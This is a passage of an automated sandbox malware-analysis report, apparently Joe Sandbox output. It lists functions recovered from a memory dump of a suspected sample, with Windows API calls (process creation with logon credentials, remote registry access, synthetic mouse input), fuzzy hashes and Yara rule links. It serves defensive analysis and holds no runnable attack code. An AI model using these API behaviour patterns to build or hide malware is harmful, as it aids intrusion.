                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003E9EDA
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003E9EED
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003E9F00
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003E9F13
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003E9F26
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003E9F39
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003E9F4C
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003E9F5F
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003E9F72
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003E9F85
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003E9F98
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003E9FAB
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003E9FBE
                            • __mtinitlocks.LIBCMT ref: 003E9AEB
                            • __mtterm.LIBCMT ref: 003E9AF4
                              • Part of subcall function 003E9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003E9AF9,003E7CD0,0047A0B8,00000014), ref: 003E9C56
                              • Part of subcall function 003E9B5C: _free.LIBCMT ref: 003E9C5D
                              • Part of subcall function 003E9B5C: DeleteCriticalSection.KERNEL32(02H,?,?,003E9AF9,003E7CD0,0047A0B8,00000014), ref: 003E9C7F
                            • __calloc_crt.LIBCMT ref: 003E9B19
                            • __initptd.LIBCMT ref: 003E9B3B
                            • GetCurrentThreadId.KERNEL32(003E7CD0,0047A0B8,00000014), ref: 003E9B42
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: 6707e0a2c4f3e90cbe3cfbcd68b394784995453efce5b5cf58de2296928dc4ee
                            • Instruction ID: 134b213bdfc82ca8169c6ad7678934c1692c74a201342f5a04160626f3d369cc
                            • Opcode Fuzzy Hash: 6707e0a2c4f3e90cbe3cfbcd68b394784995453efce5b5cf58de2296928dc4ee
                            • Instruction Fuzzy Hash: 2CF0C2725097B259EB3677777C0378A26819F02734B21072BF414D90E2EE1094400364
                            Function 0044B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0044B644
                            • _memset.LIBCMT ref: 0044B653
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00486F20,00486F64), ref: 0044B682
                            • CloseHandle.KERNEL32 ref: 0044B694
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memset$CloseCreateHandleProcess
                            • String ID: oH$doH
                            • API String ID: 3277943733-958180794
                            • Opcode ID: 4be1e3e562fe408318c98e970972f9e45b5b900cb034c5ade8796a5b180f00a1
                            • Instruction ID: 1ed8048f1399c9c3b88d888b4774b1e1bfefaabf2a42a1039d5c6a2409021c44
                            • Opcode Fuzzy Hash: 4be1e3e562fe408318c98e970972f9e45b5b900cb034c5ade8796a5b180f00a1
                            • Instruction Fuzzy Hash: FDF05EB2540314BAE2502B61BC06FBF3A9CEB09795F014835BB08E9192D7759C0087AC
                            Function 003E406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003E3F85), ref: 003E4085
                            • GetProcAddress.KERNEL32(00000000), ref: 003E408C
                            • EncodePointer.KERNEL32(00000000), ref: 003E4097
                            • DecodePointer.KERNEL32(003E3F85), ref: 003E40B2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                            • String ID: RoUninitialize$combase.dll
                            • API String ID: 3489934621-2819208100
                            • Opcode ID: 890a310b7ff61e8701773377abd41c72f51f44f0eadd091fcbbdbbdc707da476
                            • Instruction ID: feec240fb1badec091cd16572eae50158f6a82a6d74a22799619ca5d4a9bc542
                            • Opcode Fuzzy Hash: 890a310b7ff61e8701773377abd41c72f51f44f0eadd091fcbbdbbdc707da476
                            • Instruction Fuzzy Hash: 5DE09274981200ABEA60AF61ED0DB497AA5B706F43F10493AF901E10A0CFB64A089B1C
                            Function 004264B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove$__itow__swprintf
                            • String ID:
                            • API String ID: 3253778849-0
                            • Opcode ID: eff7f4e5f5b6e760b2da2a9c47064d3ee6628312d1e99789fb4305ac86d0cacb
                            • Instruction ID: 173645326c4f2347be4089ac311aa28b66868983fdc40a1069baf144f74023a1
                            • Opcode Fuzzy Hash: eff7f4e5f5b6e760b2da2a9c47064d3ee6628312d1e99789fb4305ac86d0cacb
                            • Instruction Fuzzy Hash: 65618E3060066A9BCF06EF60DC86FBE37A5AF44308F45456AFC199B292DA78DC45CB54
                            Function 004401E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 00440E1A: CharUpperBuffW.USER32(?,?), ref: 00440E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004402BD
                            • RegOpenKeyExW.ADVAPI32 ref: 004402FD
                            • RegCloseKey.ADVAPI32(?), ref: 00440320
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00440349
                            • RegCloseKey.ADVAPI32(?), ref: 0044038C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00440399
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                            • String ID:
                            • API String ID: 4046560759-0
                            • Opcode ID: 38aaf00b899de53ec7def33057f53da2250aa4af8c6c57319e0d0b61e934b104
                            • Instruction ID: 32fb1a6b6399e660ed003c49029a12baf600ac19c0da5e804b535e5464a0423d
                            • Opcode Fuzzy Hash: 38aaf00b899de53ec7def33057f53da2250aa4af8c6c57319e0d0b61e934b104
                            • Instruction Fuzzy Hash: 91517731208200AFD715EF64C885E6BBBE9FF88314F00492EF9458B2A2DB35E955CB56
                            Function 00445799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenu.USER32(?,00000001,00000000), ref: 004457FB
                            • GetMenuItemCount.USER32(00000000), ref: 00445832
                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0044585A
                            • GetMenuItemID.USER32(?,?), ref: 004458C9
                            • GetSubMenu.USER32(?,?), ref: 004458D7
                            • PostMessageW.USER32 ref: 00445928
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Menu$Item$CountMessagePostString
                            • String ID:
                            • API String ID: 650687236-0
                            • Opcode ID: 3e7398098b85ca54714f730d5f9a799b41c44ac4dda77d5a773f9909d284e746
                            • Instruction ID: cb976cea4dd5503f4ead9a1819143430459684e2c2748bc3e5b0056b540a0dd9
                            • Opcode Fuzzy Hash: 3e7398098b85ca54714f730d5f9a799b41c44ac4dda77d5a773f9909d284e746
                            • Instruction Fuzzy Hash: EE517F75E00625EFDF15EF64C845AAEB7B4EF49320F11406AE805BB352CB78AE41CB94
                            Function 0041EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0041EF06
                            • VariantClear.OLEAUT32(00000013), ref: 0041EF78
                            • VariantClear.OLEAUT32(00000000), ref: 0041EFD3
                            • _memmove.LIBCMT ref: 0041EFFD
                            • VariantClear.OLEAUT32(?), ref: 0041F04A
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0041F078
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$Clear$ChangeInitType_memmove
                            • String ID:
                            • API String ID: 1101466143-0
                            • Opcode ID: 74e25309ff75d53fb7f40d5d13b63090615aeba058aad7565ce15e01bd997015
                            • Instruction ID: 2c7754ab85e6bd84b03ffbdf5d68f958e86cc69e127211d7b1ac9c01936edb48
                            • Opcode Fuzzy Hash: 74e25309ff75d53fb7f40d5d13b63090615aeba058aad7565ce15e01bd997015
                            • Instruction Fuzzy Hash: 4E515DB5A00209EFCB14CF58C884AAABBF8FF4C314B15856AED59DB301E734E955CB94
                            Function 0042220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00422258
                            • GetMenuItemInfoW.USER32 ref: 004222A3
                            • IsMenu.USER32(00000000), ref: 004222C3
                            • CreatePopupMenu.USER32 ref: 004222F7
                            • GetMenuItemCount.USER32(000000FF), ref: 00422355
                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00422386
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                            • String ID:
                            • API String ID: 3311875123-0
                            • Opcode ID: c34143b151a8dced9abc07530c049b11c26f97b1a6d1b146f9f6dd6b7219d2c8
                            • Instruction ID: c1fb0059478512557a9926504beaa5dd2f8d2b17bf8b1ce7277898d49aa4a940
                            • Opcode Fuzzy Hash: c34143b151a8dced9abc07530c049b11c26f97b1a6d1b146f9f6dd6b7219d2c8
                            • Instruction Fuzzy Hash: 8351B130700269FBDF21CF74EA88BAEBBF5AF45318F50416AE81197290D3BC8905CB59
                            Function 003C1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • BeginPaint.USER32(?,?), ref: 003C179A
                            • GetWindowRect.USER32(?,?), ref: 003C17FE
                            • ScreenToClient.USER32(?,?), ref: 003C181B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003C182C
                            • EndPaint.USER32(?,?), ref: 003C1876
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                            • String ID:
                            • API String ID: 1827037458-0
                            • Opcode ID: d5110d14b12fbead7ce31a2c97c42187f097fad7c61333238bdacde9235d6cc3
                            • Instruction ID: 7d41ada5841e1f7feea256d7a1504e3e4ee5d2965369e6f92c67134248d90526
                            • Opcode Fuzzy Hash: d5110d14b12fbead7ce31a2c97c42187f097fad7c61333238bdacde9235d6cc3
                            • Instruction Fuzzy Hash: 5D418B74104700AFD712EF25CC84FBA7BE8EB46724F04466DFAA4CA1A2C7309C45EB61
                            Function 0044B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(004857B0,00000000), ref: 0044B712
                            • EnableWindow.USER32(00000000,00000000), ref: 0044B736
                            • ShowWindow.USER32(004857B0,00000000), ref: 0044B796
                            • ShowWindow.USER32(00000000,00000004), ref: 0044B7A8
                            • EnableWindow.USER32(00000000,00000001), ref: 0044B7CC
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0044B7EF
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            • Opcode ID: 5c2bb08031869754fe17abc132157cf68132381d09a06a3b6a5737a87c216b8c
                            • Instruction ID: 874ff15d81e0023792dd75d19e1388837c14558216661ad69591693f27816fb4
                            • Opcode Fuzzy Hash: 5c2bb08031869754fe17abc132157cf68132381d09a06a3b6a5737a87c216b8c
                            • Instruction Fuzzy Hash: 7F417134600240AFEB22CF24C499B967FE1FF45314F1841BAEA488F7A2C735E856CB95
                            Function 0043709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 004370AC
                              • Part of subcall function 004339A0: GetWindowRect.USER32(?,?), ref: 004339B3
                            • GetDesktopWindow.USER32 ref: 004370D6
                            • GetWindowRect.USER32(00000000), ref: 004370DD
                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0043710F
                              • Part of subcall function 00425244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004252BC
                            • GetCursorPos.USER32(?), ref: 0043713B
                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00437199
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                            • String ID:
                            • API String ID: 4137160315-0
                            • Opcode ID: a9af13f0357cfdebba47e32579469a355283314f4ce1cb46660016596be49430
                            • Instruction ID: 2a32c8180f99cb80ac754089dc70873ce8d811b96b5ebf3c86693ee3a762593f
                            • Opcode Fuzzy Hash: a9af13f0357cfdebba47e32579469a355283314f4ce1cb46660016596be49430
                            • Instruction Fuzzy Hash: F331D272509305ABD720DF14D849F9BB7E9FF89314F00092AF58597291CA34EA09CB9A
                            Function 00418879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004180C0
                              • Part of subcall function 004180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004180CA
                              • Part of subcall function 004180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004180D9
                              • Part of subcall function 004180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004180E0
                              • Part of subcall function 004180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004180F6
                            • GetLengthSid.ADVAPI32(?,00000000,0041842F), ref: 004188CA
                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004188D6
                            • HeapAlloc.KERNEL32(00000000), ref: 004188DD
                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 004188F6
                            • GetProcessHeap.KERNEL32(00000000,00000000,0041842F), ref: 0041890A
                            • HeapFree.KERNEL32(00000000), ref: 00418911
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                            • String ID:
                            • API String ID: 3008561057-0
                            • Opcode ID: b829cd318fa1aa8696604c439d78930fadec73b4f80b78ccc494eb99a8ec1532
                            • Instruction ID: 51e46574c99020af91ce48f8188ad817a4e66a5bac20fe3376ba96fd389fb53a
                            • Opcode Fuzzy Hash: b829cd318fa1aa8696604c439d78930fadec73b4f80b78ccc494eb99a8ec1532
                            • Instruction Fuzzy Hash: 2C11AF75511609FFDB109FA4DC0ABFF7BA8EB86315F10406EE84597210CB3AAD84DB68
                            Function 004185B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004185E2
                            • OpenProcessToken.ADVAPI32(00000000), ref: 004185E9
                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004185F8
                            • CloseHandle.KERNEL32(00000004), ref: 00418603
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00418632
                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00418646
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                            • String ID:
                            • API String ID: 1413079979-0
                            • Opcode ID: 61a940346fa28c5c9f82c29eb8b29829c85f0ad83e87f656f93c406902f50fc4
                            • Instruction ID: 91ec06880b319b146670b56e105a6673ef6735bd5e3ac2cc541d6aa9e23b5a8b
                            • Opcode Fuzzy Hash: 61a940346fa28c5c9f82c29eb8b29829c85f0ad83e87f656f93c406902f50fc4
                            • Instruction Fuzzy Hash: 8C118976100209ABDF018FA4DD49BDF7BA9EF49344F044069FE04A2160C77A9DA5EB64
                            Function 0041B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 0041B7B5
                            • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 0041B7C6
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 0041B7CD
                            • ReleaseDC.USER32(00000000,00000000), ref: 0041B7D5
                            • MulDiv.KERNEL32 ref: 0041B7EC
                            • MulDiv.KERNEL32 ref: 0041B7FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CapsDevice$Release
                            • String ID:
                            • API String ID: 1035833867-0
                            • Opcode ID: 30aa3f54f9d16ee37eb48bdca9b3edbb59decb6abb8a5be488832af1ce94401b
                            • Instruction ID: 72e821580d469320957efc14d130a6f539fa198623eab7e23370cd199e7e3809
                            • Opcode Fuzzy Hash: 30aa3f54f9d16ee37eb48bdca9b3edbb59decb6abb8a5be488832af1ce94401b
                            • Instruction Fuzzy Hash: 55018479E00319BBEB109BF69C45A5FBFB8EB49351F044076FA08A7291D6309C00CF94
                            Function 003E0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003E0193
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 003E019B
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003E01A6
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003E01B1
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 003E01B9
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003E01C1
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Virtual
                            • String ID:
